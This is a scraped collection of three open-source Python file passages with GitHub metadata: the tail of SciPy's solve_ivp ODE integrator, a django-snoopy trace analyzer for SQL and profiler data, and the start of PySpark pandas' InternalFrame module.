    >>> sol = solve_ivp(lotkavolterra, [0, 15], [10, 5], args=(1.5, 1, 3, 1),
    ...                 dense_output=True)
    Compute a dense solution and plot it.
    >>> t = np.linspace(0, 15, 300)
    >>> z = sol.sol(t)
    >>> import matplotlib.pyplot as plt
    >>> plt.plot(t, z.T)
    >>> plt.xlabel('t')
    >>> plt.legend(['x', 'y'], shadow=True)
    >>> plt.title('Lotka-Volterra System')
    >>> plt.show()
    """
    # Validate the requested integration method before doing any work.
    if method not in METHODS and not (
            inspect.isclass(method) and issubclass(method, OdeSolver)):
        raise ValueError("`method` must be one of {} or OdeSolver class."
                         .format(METHODS))
    t0, tf = map(float, t_span)
    if args is not None:
        # Wrap the user's fun (and jac, if given) in lambdas to hide the
        # additional parameters. Pass in the original fun as a keyword
        # argument to keep it in the scope of the lambda.
        fun = lambda t, x, fun=fun: fun(t, x, *args)
        jac = options.get('jac')
        if callable(jac):
            options['jac'] = lambda t, x: jac(t, x, *args)
    # Validate `t_eval`: 1-D, inside `t_span`, monotonic in the direction
    # of integration.
    if t_eval is not None:
        t_eval = np.asarray(t_eval)
        if t_eval.ndim != 1:
            raise ValueError("`t_eval` must be 1-dimensional.")
        if np.any(t_eval < min(t0, tf)) or np.any(t_eval > max(t0, tf)):
            raise ValueError("Values in `t_eval` are not within `t_span`.")
        d = np.diff(t_eval)
        if tf > t0 and np.any(d <= 0) or tf < t0 and np.any(d >= 0):
            raise ValueError("Values in `t_eval` are not properly sorted.")
        if tf > t0:
            t_eval_i = 0
        else:
            # Make order of t_eval decreasing to use np.searchsorted.
            t_eval = t_eval[::-1]
            # This will be an upper bound for slices.
            t_eval_i = t_eval.shape[0]
    if method in METHODS:
        method = METHODS[method]
    solver = method(fun, t0, y0, tf, vectorized=vectorized, **options)
    # Choose output containers depending on the output mode.
    if t_eval is None:
        ts = [t0]
        ys = [y0]
    elif t_eval is not None and dense_output:
        ts = []
        ti = [t0]
        ys = []
    else:
        ts = []
        ys = []
    interpolants = []
    events, is_terminal, event_dir = prepare_events(events)
    if events is not None:
        if args is not None:
            # Wrap user functions in lambdas to hide the additional parameters.
            # The original event function is passed as a keyword argument to the
            # lambda to keep the original function in scope (i.e., avoid the
            # late binding closure "gotcha").
            events = [lambda t, x, event=event: event(t, x, *args)
                      for event in events]
        g = [event(t0, y0) for event in events]
        t_events = [[] for _ in range(len(events))]
        y_events = [[] for _ in range(len(events))]
    else:
        t_events = None
        y_events = None
    # Main integration loop: advance one solver step at a time until the
    # solver finishes, fails, or a terminal event fires.
    status = None
    while status is None:
        message = solver.step()
        if solver.status == 'finished':
            status = 0
        elif solver.status == 'failed':
            status = -1
            break
        t_old = solver.t_old
        t = solver.t
        y = solver.y
        if dense_output:
            sol = solver.dense_output()
            interpolants.append(sol)
        else:
            sol = None
        if events is not None:
            g_new = [event(t, y) for event in events]
            active_events = find_active_events(g, g_new, event_dir)
            if active_events.size > 0:
                if sol is None:
                    sol = solver.dense_output()
                root_indices, roots, terminate = handle_events(
                    sol, events, active_events, is_terminal, t_old, t)
                for e, te in zip(root_indices, roots):
                    t_events[e].append(te)
                    y_events[e].append(sol(te))
                if terminate:
                    # Truncate the step at the terminal event's root.
                    status = 1
                    t = roots[-1]
                    y = sol(t)
            g = g_new
        if t_eval is None:
            ts.append(t)
            ys.append(y)
        else:
            # The value in t_eval equal to t will be included.
            if solver.direction > 0:
                t_eval_i_new = np.searchsorted(t_eval, t, side='right')
                t_eval_step = t_eval[t_eval_i:t_eval_i_new]
            else:
                t_eval_i_new = np.searchsorted(t_eval, t, side='left')
                # It has to be done with two slice operations, because
                # you can't slice to 0th element inclusive using backward
                # slicing.
                t_eval_step = t_eval[t_eval_i_new:t_eval_i][::-1]
            if t_eval_step.size > 0:
                if sol is None:
                    sol = solver.dense_output()
                ts.append(t_eval_step)
                ys.append(sol(t_eval_step))
                t_eval_i = t_eval_i_new
        if t_eval is not None and dense_output:
            ti.append(t)
    message = MESSAGES.get(status, message)
    # Convert accumulated lists into arrays for the result object.
    if t_events is not None:
        t_events = [np.asarray(te) for te in t_events]
        y_events = [np.asarray(ye) for ye in y_events]
    if t_eval is None:
        ts = np.array(ts)
        ys = np.vstack(ys).T
    elif ts:
        ts = np.hstack(ts)
        ys = np.hstack(ys)
    if dense_output:
        if t_eval is None:
            sol = OdeSolution(ts, interpolants)
        else:
            sol = OdeSolution(ti, interpolants)
    else:
        sol = None
    return OdeResult(t=ts, y=ys, sol=sol, t_events=t_events, y_events=y_events,
                     nfev=solver.nfev, njev=solver.njev, nlu=solver.nlu,
                     status=status, message=message, success=status >= 0)
| {
"content_hash": "c590bce9c1608acd4503a5eb16127d97",
"timestamp": "",
"source": "github",
"line_count": 663,
"max_line_length": 92,
"avg_line_length": 41.542986425339365,
"alnum_prop": 0.6049813019642014,
"repo_name": "matthew-brett/scipy",
"id": "79c65414fbd649c3a2bda47faa8a5279f88ed28a",
"size": "27543",
"binary": false,
"copies": "1",
"ref": "refs/heads/polished-meson-windows",
"path": "scipy/integrate/_ivp/ivp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4818671"
},
{
"name": "C++",
"bytes": "3181034"
},
{
"name": "CMake",
"bytes": "29273"
},
{
"name": "Cython",
"bytes": "1035101"
},
{
"name": "Dockerfile",
"bytes": "9777"
},
{
"name": "Fortran",
"bytes": "5298461"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Meson",
"bytes": "133294"
},
{
"name": "PowerShell",
"bytes": "1554"
},
{
"name": "Python",
"bytes": "14259543"
},
{
"name": "Shell",
"bytes": "4415"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
from collections import defaultdict
from snoopy.helpers import get_app_root, default_json_serializer
from snoopy.trace import Trace
import datetime
import json
import re
DJANGO_DB_QUERY_FILE = "django/db/models/query.py"
class TraceAnalyzer(object):
    """Post-process raw Snoopy trace data into summary statistics.

    ``data`` is expected to carry (as produced by the tracing layer):
      - ``queries``: list of dicts with ``model``, ``total_query_time`` and
        ``traceback`` (a list of formatted traceback lines);
      - ``profiler_traces``: list of raw profiler call/return events.
    """

    def __init__(self, data):
        self.trace_data = data
        self.trace = None
        self.query_info = {}
        self.profiler_info = {}
        self.app_root = get_app_root()

    def process_builtin_profiler_result(self):
        """Count profiler events into ``self.profiler_info['total_traces']``."""
        self.profiler_info['total_traces'] = len(self.trace_data['profiler_traces'])
        if self.profiler_info['total_traces'] == 0:
            return
        # Each profiled call emits both a call and a return event, so halve the
        # raw count. Floor division keeps it an int on Python 3 as well
        # (plain ``/=`` would silently turn it into a float there).
        self.profiler_info['total_traces'] //= 2

    def summarize_profiler_result(self):
        """Dump the processed trace as indented JSON."""
        # print() call form is valid on both Python 2 and 3; the original
        # ``print x`` statement is a SyntaxError under Python 3.
        print(json.dumps(self.trace, indent=4, default=default_json_serializer))

    def process_traceback_line(self, line):
        """Parse one formatted traceback line.

        Expects the standard ``File "<name>", line <n>, in <func> <code>``
        shape and returns its parts as a dict of strings.
        """
        parts = line.strip().split(' ')
        return {
            "file_name": parts[1].split('"')[1],
            "function_name": parts[5].strip(),
            "line_number": parts[3].split(",")[0],
            "line": " ".join(parts[6:]).strip()
        }

    def process_query(self, query):
        """Extract per-query stats and the most relevant source line.

        Prefers the deepest frame inside the application (``self.app_root``);
        otherwise falls back to the frame that called into Django's query
        machinery (the first frame outside ``django/db/models/query.py``).
        """
        query_data = {
            'model': query['model'],
            'total_query_time': query['total_query_time'],
            'query_type': 'read'
        }
        previous_line = ""
        best_non_app_code_line = ""
        best_app_code_line = ""
        # Walk the traceback from the innermost frame outwards.
        for line in reversed(query['traceback']):
            if DJANGO_DB_QUERY_FILE in previous_line and DJANGO_DB_QUERY_FILE not in line:
                best_non_app_code_line = self.process_traceback_line(line)
            if self.app_root in line:
                best_app_code_line = self.process_traceback_line(line)
                break
            previous_line = line
        if best_app_code_line != "":
            query_data['code'] = best_app_code_line
        else:
            query_data['code'] = best_non_app_code_line
        return query_data

    def process_queries(self):
        """Aggregate query statistics by query type and model into ``self.query_info``."""
        self.query_info['total_queries'] = len(self.trace_data['queries'])
        if self.query_info['total_queries'] == 0:
            return
        self.query_info['stats'] = {
            'query_type': defaultdict(int),
            'model': {},
        }
        self.query_info['total_time_on_queries'] = 0.0
        for query in self.trace_data['queries']:
            query_data = self.process_query(query)
            if not query_data:
                continue
            self.query_info['stats']['query_type'][query_data['query_type']] += 1
            # setdefault creates the per-model and per-type buckets on first
            # sight. This also fixes a latent KeyError in the original: a model
            # seen earlier with a different query_type had no bucket for the
            # new type.
            model_info = self.query_info['stats']['model'].setdefault(
                query_data['model'],
                {'query_type': {}, 'total_query_count': 0}
            )
            model_info['total_query_count'] += 1
            model_query_type_info = model_info['query_type'].setdefault(
                query_data['query_type'],
                {
                    'count': 0,
                    'total_query_time': 0.0,
                    'max_query_time': 0.0,
                    'max_query_time_code': None
                }
            )
            model_query_type_info['count'] += 1
            model_query_type_info['total_query_time'] += query_data['total_query_time']
            if model_query_type_info['max_query_time'] < query_data['total_query_time']:
                # Track the slowest query (and its source line) per model/type.
                model_query_type_info['max_query_time'] = query_data['total_query_time']
                model_query_type_info['max_query_time_code'] = query_data['code']
            self.query_info['total_time_on_queries'] += query_data['total_query_time']

    def summarize_queries(self):
        """Print the aggregated SQL query statistics."""
        if self.query_info['total_queries'] == 0:
            return
        print("Total SQL Queries: %d" % self.query_info['total_queries'])
        print('Total time on SQL Queries: %0.4f' % self.query_info['total_time_on_queries'])
        print('Stats on SQL Queries:')
        print(json.dumps(self.query_info['stats'], indent=4))

    def summarize(self):
        """Print whichever summaries are currently enabled."""
        # print("Total Request Time: %0.4f" % self.trace_data['total_request_time'])
        # print("URL: " + self.trace_data['request'])
        # self.summarize_queries()
        self.summarize_profiler_result()

    def analyze(self):
        """Run all processing passes, build the Trace, then print a summary."""
        self.process_queries()
        self.process_builtin_profiler_result()
        self.trace = Trace(self.trace_data['profiler_traces'], self.trace_data['queries'])
        # TODO: Do the cProfiler processing as well
        self.summarize()
| {
"content_hash": "f74aef988189e43c44eb4c25891d0993",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 91,
"avg_line_length": 34.36879432624114,
"alnum_prop": 0.5489063144861742,
"repo_name": "Pradeek/django-snoopy",
"id": "cb8b31619a758adb35f1341a2d04d9828c375a0e",
"size": "4846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "snoopy/trace_analyzer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25709"
}
],
"symlink_target": ""
} |
"""
An internal immutable DataFrame with some metadata to manage indexes.
"""
import re
from typing import Any, Dict, List, Optional, Sequence, Tuple, Union, TYPE_CHECKING, cast
import numpy as np
import pandas as pd
from pandas.api.types import CategoricalDtype # noqa: F401
from pyspark._globals import _NoValue, _NoValueType
from pyspark.sql import functions as F, Column, DataFrame as SparkDataFrame, Window
from pyspark.sql.types import ( # noqa: F401
BooleanType,
DataType,
IntegralType,
LongType,
StructField,
StructType,
StringType,
)
# For running doctests and reference resolution in PyCharm.
from pyspark import pandas as ps
from pyspark.pandas._typing import Label
if TYPE_CHECKING:
# This is required in old Python 3.5 to prevent circular reference.
from pyspark.pandas.series import Series # noqa: F401 (SPARK-34943)
from pyspark.pandas.spark.utils import as_nullable_spark_type, force_decimal_precision_scale
from pyspark.pandas.data_type_ops.base import DataTypeOps
from pyspark.pandas.typedef import (
Dtype,
as_spark_type,
extension_dtypes,
infer_pd_series_spark_type,
spark_type_to_pandas_dtype,
)
from pyspark.pandas.utils import (
column_labels_level,
default_session,
is_name_like_tuple,
is_testing,
lazy_property,
name_like_string,
scol_for,
spark_column_equals,
)
# A function to turn given numbers to Spark columns that represent pandas-on-Spark index.
SPARK_INDEX_NAME_FORMAT = "__index_level_{}__".format
SPARK_DEFAULT_INDEX_NAME = SPARK_INDEX_NAME_FORMAT(0)
# A pattern to check if the name of a Spark column is a pandas-on-Spark index name or not.
SPARK_INDEX_NAME_PATTERN = re.compile(r"__index_level_[0-9]+__")
NATURAL_ORDER_COLUMN_NAME = "__natural_order__"
HIDDEN_COLUMNS = {NATURAL_ORDER_COLUMN_NAME}
DEFAULT_SERIES_NAME = 0
SPARK_DEFAULT_SERIES_NAME = str(DEFAULT_SERIES_NAME)
class InternalField:
    """
    Holds the pandas dtype of a column together with (optionally) the Spark
    ``StructField`` that backs it.

    Parameters
    ----------
    dtype : numpy.dtype or pandas' ExtensionDtype
        The dtype for the field
    struct_field : StructField, optional
        The `StructField` for the field. If None, InternalFrame will properly set.
    """

    def __init__(self, dtype: Dtype, struct_field: Optional[StructField] = None):
        self._dtype = dtype
        self._struct_field = struct_field

    @staticmethod
    def from_struct_field(
        struct_field: StructField, *, use_extension_dtypes: bool = False
    ) -> "InternalField":
        """
        Build an InternalField whose dtype is inferred from the data type of
        the given ``struct_field``.

        Parameters
        ----------
        struct_field : StructField
            The StructField used to create a new InternalField object.
        use_extension_dtypes : bool
            If True, try to use the extension dtypes.

        Returns
        -------
        InternalField
        """
        inferred_dtype = spark_type_to_pandas_dtype(
            struct_field.dataType, use_extension_dtypes=use_extension_dtypes
        )
        return InternalField(dtype=inferred_dtype, struct_field=struct_field)

    @property
    def dtype(self) -> Dtype:
        """The pandas dtype of this field."""
        return self._dtype

    @property
    def struct_field(self) -> Optional[StructField]:
        """The Spark StructField of this field, or None if not yet resolved."""
        return self._struct_field

    @property
    def name(self) -> str:
        """The field name; the StructField must be set."""
        assert self.struct_field is not None
        return self.struct_field.name

    @property
    def spark_type(self) -> DataType:
        """The Spark data type; the StructField must be set."""
        assert self.struct_field is not None
        return self.struct_field.dataType

    @property
    def nullable(self) -> bool:
        """Whether the field is nullable; the StructField must be set."""
        assert self.struct_field is not None
        return self.struct_field.nullable

    @property
    def metadata(self) -> Dict[str, Any]:
        """The StructField metadata; the StructField must be set."""
        assert self.struct_field is not None
        return self.struct_field.metadata

    @property
    def is_extension_dtype(self) -> bool:
        """True if the dtype is one of pandas' extension dtypes."""
        return isinstance(self.dtype, extension_dtypes)

    def normalize_spark_type(self) -> "InternalField":
        """Return a copy whose Spark type is made nullable with normalized
        decimal precision/scale."""
        assert self.struct_field is not None
        normalized = force_decimal_precision_scale(as_nullable_spark_type(self.spark_type))
        return self.copy(spark_type=normalized, nullable=True)

    def copy(
        self,
        *,
        name: Union[str, _NoValueType] = _NoValue,
        dtype: Union[Dtype, _NoValueType] = _NoValue,
        spark_type: Union[DataType, _NoValueType] = _NoValue,
        nullable: Union[bool, _NoValueType] = _NoValue,
        metadata: Union[Optional[Dict[str, Any]], _NoValueType] = _NoValue,
    ) -> "InternalField":
        """Return a copy of this field, overriding any explicitly passed attribute."""

        def resolve(override, fallback):
            # _NoValue marks "not passed". The fallback is a callable so the
            # current value (which may assert on a missing StructField) is only
            # touched when no override was supplied.
            return fallback() if override is _NoValue else override

        return InternalField(
            dtype=cast(Dtype, resolve(dtype, lambda: self.dtype)),
            struct_field=StructField(
                name=cast(str, resolve(name, lambda: self.name)),
                dataType=cast(DataType, resolve(spark_type, lambda: self.spark_type)),
                nullable=cast(bool, resolve(nullable, lambda: self.nullable)),
                metadata=cast(
                    Optional[Dict[str, Any]], resolve(metadata, lambda: self.metadata)
                ),
            ),
        )

    def __eq__(self, other: Any) -> bool:
        if not isinstance(other, InternalField):
            return False
        return self.dtype == other.dtype and self.struct_field == other.struct_field

    def __repr__(self) -> str:
        return "InternalField(dtype=%s,struct_field=%s)" % (self.dtype, self.struct_field)
class InternalFrame(object):
"""
The internal immutable DataFrame which manages Spark DataFrame and column names and index
information.
.. note:: this is an internal class. It is not supposed to be exposed to users and users
should not directly access to it.
The internal immutable DataFrame represents the index information for a DataFrame it belongs to.
For instance, if we have a pandas-on-Spark DataFrame as below, pandas DataFrame does not
store the index as columns.
>>> psdf = ps.DataFrame({
... 'A': [1, 2, 3, 4],
... 'B': [5, 6, 7, 8],
... 'C': [9, 10, 11, 12],
... 'D': [13, 14, 15, 16],
... 'E': [17, 18, 19, 20]}, columns = ['A', 'B', 'C', 'D', 'E'])
>>> psdf # doctest: +NORMALIZE_WHITESPACE
A B C D E
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
However, all columns including index column are also stored in Spark DataFrame internally
as below.
>>> psdf._internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
In order to fill this gap, the current metadata is used by mapping Spark's internal column
to pandas-on-Spark's index. See the method below:
* `spark_frame` represents the internal Spark DataFrame
* `data_spark_column_names` represents non-indexing Spark column names
* `data_spark_columns` represents non-indexing Spark columns
* `data_fields` represents non-indexing InternalFields
* `index_spark_column_names` represents internal index Spark column names
* `index_spark_columns` represents internal index Spark columns
* `index_fields` represents index InternalFields
* `spark_column_names` represents all columns
* `index_names` represents the external index name as a label
* `to_internal_spark_frame` represents Spark DataFrame derived by the metadata. Includes index.
* `to_pandas_frame` represents pandas DataFrame derived by the metadata
>>> internal = psdf._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['A', 'B', 'C', 'D', 'E']
>>> internal.index_spark_column_names
['__index_level_0__']
>>> internal.spark_column_names
['__index_level_0__', 'A', 'B', 'C', 'D', 'E']
>>> internal.index_names
[None]
>>> internal.data_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField(A,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(B,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(C,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(D,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(E,LongType,false))]
>>> internal.index_fields
[InternalField(dtype=int64,struct_field=StructField(__index_level_0__,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
>>> internal.to_pandas_frame
A B C D E
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
In case that index is set to one of the existing column as below:
>>> psdf1 = psdf.set_index("A")
>>> psdf1 # doctest: +NORMALIZE_WHITESPACE
B C D E
A
1 5 9 13 17
2 6 10 14 18
3 7 11 15 19
4 8 12 16 20
>>> psdf1._internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+---+---+---+---+---+
| A| B| C| D| E|
+---+---+---+---+---+
| 1| 5| 9| 13| 17|
| 2| 6| 10| 14| 18|
| 3| 7| 11| 15| 19|
| 4| 8| 12| 16| 20|
+---+---+---+---+---+
>>> internal = psdf1._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['B', 'C', 'D', 'E']
>>> internal.index_spark_column_names
['A']
>>> internal.spark_column_names
['A', 'B', 'C', 'D', 'E']
>>> internal.index_names
[('A',)]
>>> internal.data_fields
[InternalField(dtype=int64,struct_field=StructField(B,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(C,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(D,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(E,LongType,false))]
>>> internal.index_fields
[InternalField(dtype=int64,struct_field=StructField(A,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+---+---+---+---+---+
| A| B| C| D| E|
+---+---+---+---+---+
| 1| 5| 9| 13| 17|
| 2| 6| 10| 14| 18|
| 3| 7| 11| 15| 19|
| 4| 8| 12| 16| 20|
+---+---+---+---+---+
>>> internal.to_pandas_frame # doctest: +NORMALIZE_WHITESPACE
B C D E
A
1 5 9 13 17
2 6 10 14 18
3 7 11 15 19
4 8 12 16 20
In case that index becomes a multi index as below:
>>> psdf2 = psdf.set_index("A", append=True)
>>> psdf2 # doctest: +NORMALIZE_WHITESPACE
B C D E
A
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
>>> psdf2._internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
>>> internal = psdf2._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['B', 'C', 'D', 'E']
>>> internal.index_spark_column_names
['__index_level_0__', 'A']
>>> internal.spark_column_names
['__index_level_0__', 'A', 'B', 'C', 'D', 'E']
>>> internal.index_names
[None, ('A',)]
>>> internal.data_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField(B,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(C,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(D,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(E,LongType,false))]
>>> internal.index_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField(__index_level_0__,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(A,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
>>> internal.to_pandas_frame # doctest: +NORMALIZE_WHITESPACE
B C D E
A
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
For multi-level columns, it also holds column_labels
>>> columns = pd.MultiIndex.from_tuples([('X', 'A'), ('X', 'B'),
... ('Y', 'C'), ('Y', 'D')])
>>> psdf3 = ps.DataFrame([
... [1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16],
... [17, 18, 19, 20]], columns = columns)
>>> psdf3 # doctest: +NORMALIZE_WHITESPACE
X Y
A B C D
0 1 2 3 4
1 5 6 7 8
2 9 10 11 12
3 13 14 15 16
4 17 18 19 20
>>> internal = psdf3._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+------+------+------+------+-----------------+
|__index_level_0__|(X, A)|(X, B)|(Y, C)|(Y, D)|__natural_order__|
+-----------------+------+------+------+------+-----------------+
| 0| 1| 2| 3| 4| ...|
| 1| 5| 6| 7| 8| ...|
| 2| 9| 10| 11| 12| ...|
| 3| 13| 14| 15| 16| ...|
| 4| 17| 18| 19| 20| ...|
+-----------------+------+------+------+------+-----------------+
>>> internal.data_spark_column_names
['(X, A)', '(X, B)', '(Y, C)', '(Y, D)']
>>> internal.column_labels
[('X', 'A'), ('X', 'B'), ('Y', 'C'), ('Y', 'D')]
For Series, it also holds scol to represent the column.
>>> psseries = psdf1.B
>>> psseries
A
1 5
2 6
3 7
4 8
Name: B, dtype: int64
>>> internal = psseries._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['B']
>>> internal.index_spark_column_names
['A']
>>> internal.spark_column_names
['A', 'B']
>>> internal.index_names
[('A',)]
>>> internal.data_fields
[InternalField(dtype=int64,struct_field=StructField(B,LongType,false))]
>>> internal.index_fields
[InternalField(dtype=int64,struct_field=StructField(A,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+---+---+
| A| B|
+---+---+
| 1| 5|
| 2| 6|
| 3| 7|
| 4| 8|
+---+---+
>>> internal.to_pandas_frame # doctest: +NORMALIZE_WHITESPACE
B
A
1 5
2 6
3 7
4 8
"""
    def __init__(
        self,
        spark_frame: SparkDataFrame,
        index_spark_columns: Optional[List[Column]],
        index_names: Optional[List[Optional[Label]]] = None,
        index_fields: Optional[List[InternalField]] = None,
        column_labels: Optional[List[Label]] = None,
        data_spark_columns: Optional[List[Column]] = None,
        data_fields: Optional[List[InternalField]] = None,
        column_label_names: Optional[List[Optional[Label]]] = None,
    ):
        """
        Create a new internal immutable DataFrame to manage Spark DataFrame, column fields and
        index fields and names.

        :param spark_frame: Spark DataFrame to be managed.
        :param index_spark_columns: list of Spark Column
                                    Spark Columns for the index.
        :param index_names: list of tuples
                            the index names.
        :param index_fields: list of InternalField
                             the InternalFields for the index columns
        :param column_labels: list of tuples with the same length
                              The multi-level values in the tuples.
        :param data_spark_columns: list of Spark Column
                                   Spark Columns to appear as columns. If this is None, calculated
                                   from spark_frame.
        :param data_fields: list of InternalField
                            the InternalFields for the data columns
        :param column_label_names: Names for each of the column index levels.

        See the examples below to refer what each parameter means.

        >>> column_labels = pd.MultiIndex.from_tuples(
        ...     [('a', 'x'), ('a', 'y'), ('b', 'z')], names=["column_labels_a", "column_labels_b"])
        >>> row_index = pd.MultiIndex.from_tuples(
        ...     [('foo', 'bar'), ('foo', 'bar'), ('zoo', 'bar')],
        ...     names=["row_index_a", "row_index_b"])
        >>> psdf = ps.DataFrame(
        ...     [[1, 2, 3], [4, 5, 6], [7, 8, 9]], index=row_index, columns=column_labels)
        >>> psdf.set_index(('a', 'x'), append=True, inplace=True)
        >>> psdf  # doctest: +NORMALIZE_WHITESPACE
        column_labels_a                  a  b
        column_labels_b                  y  z
        row_index_a row_index_b (a, x)
        foo         bar         1        2  3
                                4        5  6
        zoo         bar         7        8  9

        >>> internal = psdf._internal

        >>> internal.spark_frame.show()  # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
        +-----------------+-----------------+------+------+------+...
        |__index_level_0__|__index_level_1__|(a, x)|(a, y)|(b, z)|...
        +-----------------+-----------------+------+------+------+...
        |              foo|              bar|     1|     2|     3|...
        |              foo|              bar|     4|     5|     6|...
        |              zoo|              bar|     7|     8|     9|...
        +-----------------+-----------------+------+------+------+...

        >>> internal.index_spark_columns  # doctest: +SKIP
        [Column<'__index_level_0__'>, Column<'__index_level_1__'>, Column<'(a, x)'>]

        >>> internal.index_names
        [('row_index_a',), ('row_index_b',), ('a', 'x')]

        >>> internal.index_fields  # doctest: +NORMALIZE_WHITESPACE
        [InternalField(dtype=object,struct_field=StructField(__index_level_0__,StringType,false)),
         InternalField(dtype=object,struct_field=StructField(__index_level_1__,StringType,false)),
         InternalField(dtype=int64,struct_field=StructField((a, x),LongType,false))]

        >>> internal.column_labels
        [('a', 'y'), ('b', 'z')]

        >>> internal.data_spark_columns  # doctest: +SKIP
        [Column<'(a, y)'>, Column<'(b, z)'>]

        >>> internal.data_fields  # doctest: +NORMALIZE_WHITESPACE
        [InternalField(dtype=int64,struct_field=StructField((a, y),LongType,false)),
         InternalField(dtype=int64,struct_field=StructField((b, z),LongType,false))]

        >>> internal.column_label_names
        [('column_labels_a',), ('column_labels_b',)]
        """

        assert isinstance(spark_frame, SparkDataFrame)
        assert not spark_frame.isStreaming, "pandas-on-Spark does not support Structured Streaming."

        # When no index columns are given, project to the requested data columns
        # (aliased by label, if labels were given) and attach a fresh default
        # index column; the fields describing the data are re-derived afterwards
        # because the projection may have renamed the columns.
        if not index_spark_columns:
            if data_spark_columns is not None:
                if column_labels is not None:
                    data_spark_columns = [
                        scol.alias(name_like_string(label))
                        for scol, label in zip(data_spark_columns, column_labels)
                    ]
                spark_frame = spark_frame.select(data_spark_columns)

